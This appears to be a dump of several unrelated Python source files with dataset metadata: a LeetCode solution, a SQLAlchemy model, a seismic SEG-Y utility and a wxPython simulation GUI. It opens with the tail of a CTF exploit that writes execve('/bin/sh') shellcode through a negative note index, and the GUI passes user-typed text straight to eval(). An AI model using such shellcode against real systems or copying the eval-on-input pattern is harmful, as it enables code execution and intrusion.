p.recvuntil(\"size:\")\n p.sendline(str(size))\n p.recvuntil(\"content:\")\n\n p.sendline(content)\n\ndef delete(index):\n p.recvuntil(\"your choice>> \")\n p.sendline(\"4\")\n p.recvuntil(\"index:\")\n p.sendline(str(index))\n\ndef exit():\n p.recvuntil(\"your choice>> \")\n p.sendline(\"5\")\n\noffset = 17\nadd(-17, 8, \"\\x48\\x31\\xc0\\x50\\xeb\\x1a\") # xor rax, rax push rax\nadd(0, 8, \"\\x48\\x31\\xf6\\x53\\xeb\\x1a\") #xor rsi, rsi push rbx\ngdb.attach(p)\nadd(1, 8, \"\\xbb\\x2f\\x62\\x69\\x6e\\xeb\\x19\") #mov rbx, 0x6e69622f\nadd(2, 8, \"\\x48\\x89\\x1c\\x24\\xeb\\x1a\") #mov [rsp], rbx\nadd(3, 8, \"\\xbb\\x2f\\x2f\\x73\\x68\\xeb\\x19\") #mov rbx, 0x68732f2f \nadd(4, 8, \"\\x48\\x89\\x5c\\x24\\x04\\xeb\\x19\") #mov [rsp+4], rbx\nadd(5, 8, \"\\x54\\x5f\\x5b\\x5e\\xeb\\x1a\") #push rsp pop rdi pop rbx pop rsi\nadd(6, 8, \"\\xb0\\x3b\\x0f\\x05\") #mov al, 0x3b syscall\ndelete(2)\n#log.info(\"execve shellcode\")\np.interactive()\n","sub_path":"2018/National/pwn/note_service/exp01.py","file_name":"exp01.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"374979355","text":"# -*- coding: utf-8 -*-\n# @StartTime : 2018/5/13 21:17\n# @EndTime : 2018/5/13 21:17\n# @Author : Andy\n# @Site : \n# @File : 180513jump_game.py\n# @Software: PyCharm\n\"\"\"\nGiven an array of non-negative integers, you are initially positioned at the first index of the array.\n\nEach element in the array represents your maximum jump length at that position.\n\nDetermine if you are able to reach the last index.\n\nExample 1:\n\nInput: [2,3,1,1,4]\nOutput: true\nExplanation: Jump 1 step from index 0 to 1, then 3 steps to the last index.\nExample 2:\n\nInput: [3,2,1,0,4]\nOutput: false\nExplanation: You will always arrive at index 3 no matter what. 
Its maximum\n jump length is 0, which makes it impossible to reach the last index.\n\"\"\"\n\n#\n# class Solution(object):\n# def canJump(self, nums):\n# \"\"\"\n# :type nums: List[int]\n# :rtype: bool\n# \"\"\"\n# size = len(nums)\n# count = 0\n# index = size - 1\n# while 1:\n# if index == 0:\n# return True\n# for j in range(index - 1, -1, -1):\n# if (nums[j] + j) >= index:\n# index = j\n# break\n# if j == 0:\n# count += 1\n# if count == size:\n# return False\n\n\nclass Solution(object):\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n size = len(nums)\n index = size - 1\n for i in range(index)[::-1]:\n if i + nums[i] >= index:\n index = i\n return not index\n\n\n\nSo = Solution()\nprint(So.canJump([2,0]))\nprint(So.canJump([2,3,1,1,4]))","sub_path":"LeetCode/17/180513jump_game.py","file_name":"180513jump_game.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"9026258","text":"\"\"\"Media - MODEL\n\n\"\"\"\nfrom sqlalchemy import Column, String, Text, DateTime, Integer, UniqueConstraint\n\nfrom app.models.base import Base\n\n\nclass Media(Base):\n\n __tablename__ = 'media'\n\n url = Column(String(500), nullable=False)\n file = Column(String(200))\n description = Column(Text())\n content_type = Column(String(50))\n domain = Column(String(50))\n author = Column(String(200))\n media_created = Column(DateTime)\n file_size = Column(Integer)\n score = Column(Integer)\n downloaded = Column(Integer)\n\n __table_args__ = (\n UniqueConstraint('url', 'file', name='uix_1'),\n )\n\n def __init__(self, _id=None):\n if _id:\n self.id = _id\n c = self.query.filter(Media.id == self.id).one()\n if c:\n self.__build_obj__(c)\n\n def __build_obj__(self, obj):\n self.id = int(obj.id)\n self.ts_created = obj.data\n self.ts_updated = obj.ts_updated\n self.url = obj.url\n self.file = obj.file\n self.description = obj.description\n self.content_type = obj.content_type\n self.domain = obj.domain\n self.author = obj.author\n self.media_created = obj.media_created\n self.l_url = \"content/%s.%s\" % (self.file, self.content_type)\n","sub_path":"app/models/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"437951905","text":"\"\"\"\nClass containing routines for handling of Segy Shot gathers\n-----------------------------------------------------------\n\n\"\"\"\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport segyio\n\n\ndef rotate(x, y, ox, oy, angle):\n\t\"\"\"\n\tApply rotation matrix as in https://en.wikipedia.org/wiki/Rotation_matrix\n\n\t:param\tnp.ndarrray x: \t\t x-coordinates\n\t:param\tnp.ndarrray y: \t\t y-coordinates\n\t:param\tfloat \t ox: \t x-origin\n\t:param\tfloat \t oy: \t y-origin\n\t:param\tfloat angle: \t rotation angle (as taken from x-axis)\n\t:param\tbool positive: \timpose positive axis\n\t\"\"\"\n\txrot , yrot = ((x-ox)*np.cos(angle) - (y-oy)*np.sin(angle)) , ((x-ox)*np.sin(angle) + (y-oy)*np.cos(angle))\n\treturn xrot , yrot\n\n\nclass SegyShot:\n\t\n\tdef __init__(self, filename, components=['P']):\n\t\t\"\"\"\n\t Class for manipulating single Segy file with Shot gather configuration\n\n\t filename: Name of file to read\n\t components: List of components recorded in data (data is assumed to be have consecutive traces representing different components)\n\n\t Returns: a SegyShot 
object\n\t\t\"\"\"\n\t\tself.filename = filename\n\t\tself.components = components\n\t\tself.ncomponents = len(components)\n\n\t\twith segyio.open(filename, \"r\", ignore_geometry=True) as sgy:\n\t\t\tself.ntraces_per_shot = sgy.bin[segyio.BinField.Traces]\n\t\t\tself.nrec = self.ntraces_per_shot // self.ncomponents\n\t\t\tself.nsrc = sgy.tracecount // self.ntraces_per_shot\n\t\t\tself.nt = sgy.bin[segyio.BinField.Samples]\n\t\tself.selected_rec = np.arange(self.nrec)\n\t\tself.selected_src = np.arange(self.nsrc)\n\n\tdef interpret(self):\n\t\t\"\"\"\n\t\tInterpret Segy shot file\n\n\t\t:param \n\t\t:return: Geometry as part of object\n\t\t\"\"\"\n\t\t\n\t\twith segyio.open(self.filename, \"r\", ignore_geometry=True) as sgy:\n\t\t\t\n\t\t\tself.t = sgy.samples/1000\n\t\t\tself.dt = self.t[1] - self.t[0]\n\t\t\tself.sc = sgy.header[0][segyio.TraceField.SourceGroupScalar]\n\t\t\tif (self.sc<0):\n\t\t\t\tself.sc=1./abs(self.sc)\n\t\t\n\t\t\tself.recx = self.sc * sgy.attributes(segyio.TraceField.GroupX)[:self.nrec*self.ncomponents:self.ncomponents]\n\t\t\tself.recy = self.sc * sgy.attributes(segyio.TraceField.GroupY)[:self.nrec*self.ncomponents:self.ncomponents]\n\t\t\tself.recz = self.sc * sgy.attributes(segyio.TraceField.GroupWaterDepth)[:self.nrec*self.ncomponents:self.ncomponents]\n\n\t\t\tself.srcx = self.sc * sgy.attributes(segyio.TraceField.SourceX)[::self.nrec*self.ncomponents]\n\t\t\tself.srcy = self.sc * sgy.attributes(segyio.TraceField.SourceY)[::self.nrec*self.ncomponents]\n\t\t\tself.srcz = self.sc * sgy.attributes(segyio.TraceField.SourceDepth)[::self.nrec*self.ncomponents]\n\n\tdef showgeometry(self, local=False, figsize=(10, 10), newfig=True):\n\t\t\"\"\"\n\t\tVisualize geometry\n\n\t\t:param\tlocal: \t\tLocal or global geometry\n\t\t:param\tfigsize: \tFigure size \n\t\t:param\tnewfig: \tCreate new figure or not\n\n\t\t\"\"\"\n\t\tif local:\n\t\t\trecx, recy = self.recx_local , self.recy_local\n\t\t\tsrcx, srcy = self.srcx_local , self.srcy_local\n\t\telse:\n\t\t\trecx, recy = self.recx , self.recy\n\t\t\tsrcx, srcy = self.srcx , self.srcy\n\n\t\tif newfig==True:\n\t\t\tplt.figure(figsize=figsize)\n\t\t\tplt.scatter(srcx, srcy, c=np.arange(self.nsrc), cmap='jet', s=1, label='src')\n\t\t\tplt.scatter(srcx[self.selected_src], srcy[self.selected_src], color='r', s=20, label='selected src')\n\t\t\tplt.scatter(recx, recy, color='b', s=1, label='rec')\n\t\t\tplt.scatter(recx[self.selected_rec], recy[self.selected_rec], color='b', s=20, label='selected rec')\n\t\t\tplt.legend()\n\n\t\telse:\n\t\t\tplt.scatter(srcx, srcy, s=1, color='r', label='src')\n\t\t\tplt.scatter(srcx[self.selected_src], srcy[self.selected_src], color='r', s=20, label='selected src')\n\t\t\tplt.scatter(recx, recy, s=1, color='b', label='rec')\n\t\t\tplt.scatter(recx[self.selected_rec], recy[self.selected_rec], s=20, color='b', label='selected rec')\n\t\t\tplt.legend()\n\t\n\tdef rotategeometry(self, velfile, plotflag=0):\n\t\t\"\"\"\n\t\tRotate geometry\n\n\t\t:param\tvelfile: \tFilename of velocity model to use for rotation\n\t\t:param\tplotflag: \tPlot intermediate results\n\t\t\"\"\"\n\t\t# read velocity file\n\t\twith segyio.open(velfile, \"r\") as vel:\n\n\t\t\tscvel = vel.header[0][segyio.TraceField.SourceGroupScalar]\n\t\t\tif (scvel<0):\n\t\t\t\tscvel=1./abs(scvel)\n\t\t\txvel , yvel = scvel * vel.attributes(segyio.TraceField.CDP_X)[:] , scvel * vel.attributes(segyio.TraceField.CDP_Y)[:]\n\n\t\t\toxvel, oyvel = scvel * vel.attributes(segyio.TraceField.CDP_X)[0], scvel * 
vel.attributes(segyio.TraceField.CDP_Y)[0]\n\t\t\toxvel1, oyvel1 = scvel * vel.attributes(segyio.TraceField.CDP_X)[len(vel.xlines)-1] , scvel * vel.attributes(segyio.TraceField.CDP_Y)[len(vel.xlines)-1]\n\n\t\t\t# find and apply rotation\n\t\t\trot, ox, oy = segyio.tools.rotation(vel, line='fast')\n\t\t\tself.ox, self.oy = scvel * ox , scvel * oy\n\t\t\tself.rot = (rot - np.pi/2)\n\n\t\t\txvel_local, yvel_local = rotate(xvel, yvel, self.ox, self.oy, self.rot)\n\t\t\toxvel_local, oyvel_local = rotate(oxvel, oyvel, self.ox, self.oy, self.rot)\n\t\t\toxvel1_local, oyvel1_local = rotate(oxvel1, oyvel1, self.ox, self.oy, self.rot)\n\n\t\t\tself.srcx_local, self.srcy_local = rotate(self.srcx, self.srcy, self.ox, self.oy, self.rot)\n\t\t\tself.recx_local, self.recy_local = rotate(self.recx, self.recy, self.ox, self.oy, self.rot)\n\t\t\n\t\t\t# identify local regular axis\n\t\t\txextent = np.max(xvel_local) - np.min(xvel_local)\n\t\t\tyextent = np.max(yvel_local) - np.min(yvel_local)\n\t\t\tdx = xextent/len(vel.xlines)\n\t\t\tdy = yextent/len(vel.ilines)\n\n\t\t\tprint('Local regular axis:\\n ox=%f, dx=%f nx=%d\\n oy=%f, dy=%f ny=%d' \n % (oxvel_local, dx, len(vel.xlines), oyvel_local, dy, len(vel.ilines)))\n\n\t\t\tif(plotflag == 1):\n\t\t\t\tplt.figure()\n\t\t\t\tplt.scatter(xvel, yvel, color='k', label='Velocity model')\n\t\t\t\tplt.scatter(self.recx, self.recy, color='b',label='rec')\n\t\t\t\tplt.scatter(self.srcx, self.srcy, color='r',label='src')\n\t\t\t\tplt.scatter(oxvel, oyvel, color='c', label='IL=0, XL=0')\n\t\t\t\tplt.scatter(oxvel1, oyvel1, color='y', label='IL=0, XL=end')\n\t\t\t\tplt.legend()\t\t\t\t\n\n\t\t\t\tplt.figure()\n\t\t\t\tplt.scatter(xvel_local, yvel_local, color='k', label='Velocity model')\n\t\t\t\tplt.scatter(self.recx_local, self.recy_local, color='b',label='rec')\n\t\t\t\tplt.scatter(self.srcx_local, self.srcy_local, color='r',label='src')\n\t\t\t\tplt.scatter(oxvel_local, oyvel_local, color='c', label='IL=0, XL=0')\n\t\t\t\tplt.scatter(oxvel1_local, oyvel1_local, color='y', label='IL=0, XL=end')\n\t\t\t\tplt.legend()\n\n\t\t\treturn dx, len(vel.xlines), dy, len(vel.ilines)\t\n \n\tdef resetrecs(self):\n\t\t\"\"\"\n\t\tReset selection subset of receivers\n \"\"\"\n\t\tself.selected_rec = np.arange(self.nrec)\n\n\tdef resetsrcs(self):\n\t\t\"\"\"\n\t\tReset selection subset of sources\n \"\"\"\n\t\tself.selected_src = np.arange(self.nsrc)\n\n\tdef selectrecs(self, start=0, end=-1, plotflag=0):\n\t\t\"\"\"\n\t\tSelect subset of receivers\n\n\t\t:param\tstart: index of first receiver to select\n\t\t:param\tend: index of last receiver to select\n\t\t:param\tplotflag: plot intermediate results\n\t\t\"\"\"\n\t\tself.resetrecs()\n\t\tif end == -1:\n\t\t\tend = self.nrec\n\n\t\tself.selected_rec = self.selected_rec[start:end]\n\n\t\tif(plotflag==1):\n\t\t\tself.showgeometry()\n\t\t\tplt.legend()\n\n\tdef selectsrcs(self, start=0, end=-1, plotflag=0):\n\t\t\"\"\"\n\t\tSelect subset of sources\n\n\t\t:param\tstart: index of first receiver to select\n\t\t:param\tend: index of last receiver to select\n\t\t:param\tplotflag: plot intermediate results\n\t\t\"\"\"\n\t\tself.resetsrcs()\n\t\tif end == -1:\n\t\t\tend = self.nsrc\n\n\t\tself.selected_src = self.selected_src[start:end]\n\n\t\tif(plotflag==1):\n\t\t\tself.showgeometry()\n\t\t\tplt.legend()\n\n\tdef get_shotgather(self, isrc):\n\t\t\"\"\"\n\t\tRetrieve shot gather\n\n\t\t:param\tisrc: index of source\n\t\t\"\"\"\n\t\twith segyio.open(self.filename, \"r\", ignore_geometry=True) as sgy:\n\t\t d = 
segyio.collect(sgy.trace[isrc*self.ntraces_per_shot:(isrc+1)*self.ntraces_per_shot])\n\t\tshot = {component: d[ic::self.ncomponents] for ic, component in enumerate(self.components) }\n\t\treturn shot\n\n\n","sub_path":"developement/segyshot.py","file_name":"segyshot.py","file_ext":"py","file_size_in_byte":7798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"96880735","text":"import os\nimport random\nimport sys\nimport wx\n\nimport matplotlib\nmatplotlib.use('WXAgg')\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import \\\n FigureCanvasWxAgg as FigCanvas, \\\n NavigationToolbar2WxAgg as NavigationToolbar\nimport numpy as np\nimport pylab\n\nfrom datagen import DataGen\n# from boundcontrolbox import BoundControlBox\n\nUPDATING_SEQUENTIAL = 0\nUPDATING_CSEQUENTIAL = 1\nUPDATING_SYNCHRONOUS = 2\n\nVIEW_MODE_ALL = 0\nVIEW_MODE_FOLLOW = 1\n\nclass GraphFrame(wx.Frame):\n title = 'Magnetizr'\n time_step = 100 # 100ms\n def __init__(self):\n wx.Frame.__init__(self, None, -1, self.title, size=(1230,610))\n\n self.datagen = DataGen()\n self._data = [self.datagen.initialise()]\n self.paused = True\n self.running = False\n\n self.plot_view = VIEW_MODE_ALL\n self.follow_last = 10 # lines\n\n self.create_menu() # shortcuts\n self.create_status_bar() # line at the bottom\n\n self.MainGrid = wx.FlexGridSizer( 2, 2, 0, 0 )\n self.init_plot() # \"the drawing place\"\n self.draw_interface() # controls\n\n self.redraw_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self.on_redraw_timer, self.redraw_timer)\n self.redraw_timer.Start(self.time_step)\n\n def create_menu(self):\n self.menubar = wx.MenuBar()\n menu_file = wx.Menu()\n m_expt = menu_file.Append(-1, \"&Save plot\\tCtrl-S\", \"Save plot to file\")\n self.Bind(wx.EVT_MENU, self.on_save_plot, m_expt)\n menu_file.AppendSeparator()\n m_exit = menu_file.Append(-1, \"E&xit\\tCtrl-X\", \"Exit\")\n self.Bind(wx.EVT_MENU, self.on_exit, m_exit)\n self.menubar.Append(menu_file, \"&File\")\n self.SetMenuBar(self.menubar)\n\n def create_status_bar(self):\n self.statusbar = self.CreateStatusBar()\n\n def draw_interface(self):\n self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )\n self.MainGrid.SetFlexibleDirection( wx.BOTH )\n self.MainGrid.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )\n\n # PLOT\n Plot = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Plot\" ), wx.VERTICAL )\n Plot.SetMinSize( wx.Size( 400,200 ) )\n self.plot_sizer = wx.BoxSizer(wx.VERTICAL)\n self.plot_sizer.Add(self.canvas, 1, wx.EXPAND | wx.ALL)\n Plot.Add( self.plot_sizer, 0, wx.ALL, 5 )\n\n # UPDATABLE\n Updatable = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Updating\" ), wx.VERTICAL )\n # Updating mode\n UpdateModes = [\"Sequential\", \"CSequential\",\"Synchronous\"]\n self.UpdateMode = wx.RadioBox(self, wx.ID_ANY, \"Update Mode\", wx.DefaultPosition, wx.DefaultSize, UpdateModes, 1, wx.RA_SPECIFY_COLS)\n Updatable.Add( self.UpdateMode, 1, wx.EXPAND|wx.ALIGN_CENTER_HORIZONTAL, 5 )\n self.UpdateMode.Bind(wx.EVT_RADIOBUTTON, self.on_update_mode)\n # Plot view\n self.PlotView = wx.RadioBox(self, wx.ID_ANY, \"Plot view\", wx.DefaultPosition, wx.DefaultSize, [\"See all\", \"Follow\"], 1, wx.RA_SPECIFY_COLS)\n Updatable.Add( self.PlotView, 1, wx.EXPAND, 5 )\n self.PlotView.Bind(wx.EVT_RADIOBUTTON, self.on_view_update)\n # CL size\n CLSize = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"cL\" ), wx.VERTICAL )\n self.CL = wx.Slider( self, wx.ID_ANY, 1, 1, 200, wx.DefaultPosition, 
wx.DefaultSize, wx.SL_HORIZONTAL )\n self.Bind(wx.EVT_SLIDER, self.on_update_cl ,self.CL)\n CLSize.Add( self.CL, 0, wx.ALL, 5 )\n Updatable.Add( CLSize, 1, 0, 5 )\n self.CLStatus = wx.StaticText( self, wx.ID_ANY, u\"cL=1\", wx.DefaultPosition, wx.DefaultSize, 0 )\n CLSize.Add( self.CLStatus, 0, wx.ALL, 5 )\n\n # W0\n WZero = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"W0\" ), wx.VERTICAL )\n self.W0 = wx.TextCtrl( self, wx.ID_ANY, u\"(cL/L)*i*1.0\", wx.DefaultPosition, wx.DefaultSize, 0 )\n WZero.Add( self.W0, 0, wx.ALL, 5 )\n self.AddW0Btn = wx.Button(self, label=\"Set\")\n self.Bind(wx.EVT_BUTTON, self.on_update_w0 ,self.AddW0Btn)\n WZero.Add( self.AddW0Btn, 0, wx.ALL, 5 )\n self.W0Status = wx.StaticText( self, wx.ID_ANY, u\"W0(i,cL,L)=0.5\", wx.DefaultPosition, wx.DefaultSize, 0 )\n WZero.Add( self.W0Status, 0, wx.ALL, 5 )\n Updatable.Add( WZero, 1, wx.EXPAND, 5 )\n\n # SIMULATION CONTROLS\n Simulation = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Simulation\" ), wx.HORIZONTAL )\n # Starting conditions\n self.StartConditions = wx.RadioBox(self, wx.ID_ANY, \"Starting\", wx.DefaultPosition, wx.DefaultSize, [\"Ferromagnet\", \"Antiferromagnet\", \"Random\"], 1, wx.RA_SPECIFY_COLS)\n self.StartConditions.SetSelection(self.datagen.mode)\n Simulation.Add( self.StartConditions, 1, wx.EXPAND, 5 )\n self.StartConditions.Bind(wx.EVT_RADIOBUTTON, self.on_update_start)\n # Boundaries\n self.Boundaries = wx.RadioBox(self, wx.ID_ANY, \"Boundaries\", wx.DefaultPosition, wx.DefaultSize, [\"Cyclic\", \"Sharp(table)\"], 1, wx.RA_SPECIFY_COLS)\n self.Boundaries.SetSelection(self.datagen.boundaries)\n Simulation.Add( self.Boundaries, 1, wx.EXPAND, 5 )\n self.Boundaries.Bind(wx.EVT_RADIOBUTTON, self.on_update_boundaries)\n # Time steps\n TimeSteps = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Time steps\" ), wx.VERTICAL )\n self.Time = wx.TextCtrl( self, wx.ID_ANY, u\"100\", wx.DefaultPosition, wx.DefaultSize, 0 )\n wx.EVT_KEY_UP(self.Time, self.on_update_time_steps)\n TimeSteps.Add( self.Time, 0, wx.ALL, 5 )\n Simulation.Add( TimeSteps, 1, wx.EXPAND, 5 )\n # Startstop\n StartStop = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Start/Stop\" ), wx.VERTICAL )\n self.StartStopBtn = wx.Button(self, label=\"Start\")\n self.Bind(wx.EVT_BUTTON, self.on_pause_button ,self.StartStopBtn)\n StartStop.Add( self.StartStopBtn, 0, wx.ALL, 5 )\n self.ResetBtn = wx.Button(self, label=\"Reset\")\n self.Bind(wx.EVT_BUTTON, self.on_reset_button ,self.ResetBtn)\n StartStop.Add( self.ResetBtn, 0, wx.ALL, 5 )\n Simulation.Add( StartStop, 1, wx.EXPAND, 5 )\n # Simulation speed\n SimulSpeed = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Timestep lenght\" ), wx.VERTICAL )\n self.SimSpeed = wx.Slider( self, wx.ID_ANY, 100, 100, 1000, wx.DefaultPosition, wx.DefaultSize, wx.SL_HORIZONTAL )\n self.SimSpeed.Bind(wx.EVT_SLIDER, self.on_update_timestep)\n SimulSpeed.Add( self.SimSpeed, 0, wx.ALL, 5 )\n self.SimSpeedTxt = wx.StaticText(self, wx.ID_ANY, str(self.time_step)+\"ms\", wx.DefaultPosition, wx.DefaultSize)\n SimulSpeed.Add( self.SimSpeedTxt, 0, wx.ALL, 5 )\n Simulation.Add( SimulSpeed, 1, 0, 5 )\n\n self.MainGrid.Add( Plot, 1, wx.ALIGN_LEFT|wx.ALIGN_TOP, 5 )\n self.MainGrid.Add( Updatable, 1, wx.ALIGN_RIGHT|wx.ALIGN_TOP, 5 )\n self.MainGrid.Add( Simulation, 1, wx.ALIGN_BOTTOM|wx.ALIGN_LEFT, 5 )\n\n self.SetSizer( self.MainGrid )\n self.Layout()\n # self.Centre( wx.BOTH )\n\n\n def init_plot(self):\n self.dpi = 100\n self.fig = Figure((9.6, 3.7), dpi=self.dpi)\n self.axes = 
self.fig.add_subplot(1,1,1)\n self.axes.axes.get_xaxis().set_visible(False)\n self.axes.axes.get_yaxis().set_visible(False)\n self.fig.tight_layout()\n self.canvas = FigCanvas(self, -1, self.fig)\n self.plot_data = self.axes.matshow(self.data, aspect=\"auto\")\n\n def get_data(self):\n if self.plot_view == VIEW_MODE_FOLLOW:\n if len(self._data) > self.follow_last:\n return self._data[(-self.follow_last):]\n return self._data\n\n def set_data(self, value):\n self._data = value\n\n data = property(get_data, set_data)\n\n def draw_plot(self):\n self.plot_data.set_data(self.data)\n self.canvas.draw()\n if self.datagen.interations_left == 0:\n self.on_counter_0(None)\n\n def flash_status_message(self, msg, flash_len_ms=1500):\n self.statusbar.SetStatusText(msg)\n self.timeroff = wx.Timer(self)\n self.Bind(\n wx.EVT_TIMER,\n self.on_flash_status_off,\n self.timeroff)\n self.timeroff.Start(flash_len_ms, oneShot=True)\n\n def on_view_update(self, event):\n self.plot_view = self.PlotView.GetSelection()\n if self.plot_view == VIEW_MODE_FOLLOW:\n self.plot_data = self.axes.matshow(self.data, aspect=\"auto\")\n else:\n self.plot_data = self.axes.matshow(self.data, aspect=\"auto\")\n\n def on_pause_button(self, event):\n self.paused = not self.paused\n self.StartStopBtn.SetLabel(\"Start\" if self.paused else \"Stop\")\n if self.paused:\n self.Time.Enable()\n if not self.running:\n self.running = True\n self.data = [self.datagen.next()]\n self.plot_data = self.axes.matshow(self.data, aspect=\"auto\")\n self.lockdown_on()\n\n def on_reset(self, event):\n self.on_simulation_stop(event)\n self.data = [self.datagen.initialise()]\n self.plot_data = self.axes.matshow(self.data, aspect=\"auto\")\n\n def on_counter_0(self, event):\n self.on_simulation_stop(event)\n\n def on_simulation_stop(self, event):\n self.paused = True\n self.StartStopBtn.SetLabel(\"Start\")\n self.running = False\n self.lockdown_off()\n\n def on_save_plot(self, event):\n file_choices = \"PNG (*.png)|*.png\"\n\n dlg = wx.FileDialog(\n self,\n message=\"Save plot as...\",\n defaultDir=os.getcwd(),\n defaultFile=\"plot.png\",\n wildcard=file_choices,\n style=wx.SAVE)\n\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPath()\n self.canvas.print_figure(path, dpi=self.dpi)\n self.flash_status_message(\"Saved to %s\" % path)\n\n def on_redraw_timer(self, event):\n # if paused do not add data, but still redraw the plot\n # (to respond to scale modifications, grid change, etc.)\n if not self.paused:\n self._data.append(self.datagen.next())\n self.Time.SetValue(str(self.datagen.interations_left))\n if self.datagen.interations_left <= 0:\n self.paused = True\n self.draw_plot()\n\n def on_exit(self, event):\n self.Destroy()\n\n def on_flash_status_off(self, event):\n self.statusbar.SetStatusText('')\n\n # Updatables\n def on_update_mode(self, event):\n selection = self.UpdateMode.GetSelection()\n if selection == UPDATING_SEQUENTIAL: # cl = 1\n cL = 1\n elif selection == UPDATING_CSEQUENTIAL: # 1 < cL < size\n cL = int(self.datagen.size/2)\n elif selection == UPDATING_SYNCHRONOUS: # cL = size\n cL = self.datagen.size\n self.on_update_cl(None, with_update_mode = False, cL = cL)\n self.datagen.cL = cL\n\n def on_update_cl(self, event, with_update_mode = True, cL = None):\n if cL == None:\n cL = self.CL.GetValue()\n if with_update_mode:\n if cL == 1:\n self.UpdateMode.SetSelection(UPDATING_SEQUENTIAL)\n elif cL == self.datagen.size:\n self.UpdateMode.SetSelection(UPDATING_SYNCHRONOUS)\n else:\n self.UpdateMode.SetSelection(UPDATING_CSEQUENTIAL)\n 
self.CL.SetValue(cL)\n self.CLStatus.SetLabel(\"cL=%i\" % cL)\n self.datagen.cL = cL\n\n def on_update_w0(self, event):\n eq = self.W0.GetValue()\n w0 = eval(\"lambda i=0, L=0, cL=0: \" + eq)\n try:\n w0(1,1,1)\n self.datagen.w0 = w0\n self.W0Status.SetLabel(\"W0(i,cL,L)=\"+eq)\n except:\n self.W0Status.SetLabel(\"ERR\")\n\n def on_update_timestep(self, event):\n self.redraw_timer.Stop()\n self.time_step = self.SimSpeed.GetValue()\n self.SimSpeedTxt.SetLabel(str(self.time_step)+\"ms\")\n self.Bind(wx.EVT_TIMER, self.on_redraw_timer, self.redraw_timer)\n self.redraw_timer.Start(self.time_step)\n\n # Start conditions\n def on_update_start(self, event):\n self.datagen.mode = self.StartConditions.GetSelection()\n\n def on_update_boundaries(self, event):\n self.datagen.boundaries = self.Boundaries.GetSelection()\n\n def on_update_time_steps(self, event):\n self.datagen.interations_left = int(self.Time.GetValue())\n event.Skip()\n\n def on_reset_button(self, event):\n self.on_reset(event)\n self.datagen.interations_left = 100\n self.Time.SetValue(\"100\")\n\n def lockdown_on(self, event=None):\n self.StartConditions.Disable()\n self.Time.Disable()\n self.Boundaries.Disable()\n\n def lockdown_off(self, event=None):\n self.StartConditions.Enable()\n self.Time.Enable()\n self.Boundaries.Enable()\n\nif __name__ == '__main__':\n app = wx.App()\n app.frame = GraphFrame()\n app.frame.Show()\n app.MainLoop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"419891428","text":"\n\nfrom xai.brain.wordbase.nouns._subtitle import _SUBTITLE\n\n#calss header\nclass _SUBTITLING(_SUBTITLE, ):\n\tdef __init__(self,): \n\t\t_SUBTITLE.__init__(self)\n\t\tself.name = \"SUBTITLING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"subtitle\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_subtitling.py","file_name":"_subtitling.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139713581","text":"#!/usr/bin/python3\nimport ast\nimport operator as op\nimport secrets\n\nfrom multiprocessing import Process, Queue\n\n\n\noperators = {\n ast.Add: op.add,\n ast.Sub: op.sub,\n ast.Mult: op.mul,\n ast.Div: op.truediv,\n ast.Mod: op.mod,\n ast.Pow: op.pow,\n ast.LShift: op.lshift,\n ast.RShift: op.rshift,\n ast.BitOr: op.or_,\n ast.BitXor: op.xor,\n ast.BitAnd: op.and_,\n ast.FloorDiv: op.floordiv,\n ast.UAdd: op.pos,\n ast.USub: op.neg,\n ast.Not: op.is_not,\n ast.Invert: op.not_,\n}\n\n\ndef eval_expr(expr, ctx):\n return eval_(ast.parse(expr, mode=\"eval\").body, ctx)\n\n\ndef eval_(node, ctx):\n if isinstance(node, ast.Num):\n return node.n\n elif isinstance(node, ast.BinOp):\n return operators[type(node.op)](eval_(node.left, ctx), eval_(node.right, ctx))\n elif isinstance(node, ast.UnaryOp):\n return operators[type(node.op)](eval_(node.operand, ctx))\n elif isinstance(node, ast.Name):\n if node.id == \"literal\":\n raise ValueError(node)\n return ctx[node.id]\n elif isinstance(node, ast.Subscript):\n if node.value.id != \"literal\":\n raise ValueError(node)\n if not isinstance(node.slice, ast.Index):\n raise ValueError(node)\n index = eval_(node.slice.value, ctx)\n if not isinstance(index, int):\n raise ValueError(node)\n return ctx[\"literal\"][index]\n else:\n raise TypeError(node)\n\ndef encrypt_func(expr, literal, in_q, out_q):\n literal = 
